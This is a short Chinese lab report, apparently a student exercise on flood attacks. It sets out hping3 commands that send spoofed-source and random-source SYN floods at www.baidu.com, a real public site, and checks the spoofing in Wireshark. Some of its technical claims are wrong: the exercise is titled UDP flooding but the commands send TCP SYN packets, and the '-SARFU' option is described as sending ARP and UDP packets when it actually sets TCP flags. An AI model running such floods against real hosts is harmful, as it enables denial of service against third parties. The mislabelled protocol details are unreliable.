实验目的
UDP Flood攻击练习
实验内容
实验环境:kali IP:192.168.91.129
1.hping3
1.1 hping3 -S -a 1.1.1.1 -V www.baidu.com #发送SYN数据包,伪造IP来源为1.1.1.1
-a 为伪造IP地址来源
-V冗余模式
-S 发送SYN数据包
–flood 只发数据包,不考虑数据入站回显
启动wireshark抓包查看伪造的IP 1.1.1.1是否生效
抓包
通过对数据分析可以看到成功的伪造了数据包的来源,并且在不断的向外发送数据包。
1.2 hping3 -S -V –flood –rand-source -c 10000 -d 150 -w 64 -p 80 www.baidu.com
-c 10000 发送数据包数量
-d 150 发送的每个数据包的大小
-w 64 TCP窗口的大小
-p 80 攻击目的端口
–ran-source 使用随记性源IP地址
抓包
可以看到伪造的IP地址发送的数据包的数量
1.3 hping3 -SARFU -V –flood –rand-source -c 10000 -d 150 -w 64 -p 80 www.baidu.com
-SARFU 发送SYN、ARP、UDP等不同协议的数据包
抓包
实验结论
拒绝服务攻击即攻击者想办法让目标机器停止提供服务。常见为消耗宽带、CPU、内存资源(各种洪水攻击)。导致延长服务器响应时间。利用服务漏洞,攻陷服务。IP欺骗等。
UDP Flooding攻击: UDP是一个无连接的传输层协议,所以在数据传输过程,不需要建立连接和进行认证。攻击者只需要向目标发送大量巨大的UDP数据包,就会使目标所在的网络资源被耗尽。
攻击者使用源IP欺骗的方法向有漏洞的UDP服务器发送伪造请求。UDP服务器不知道请求是伪造的,就会响应。当成干上万的响应被传递给一个不知情的目标主机时,这个攻击问题就会发生。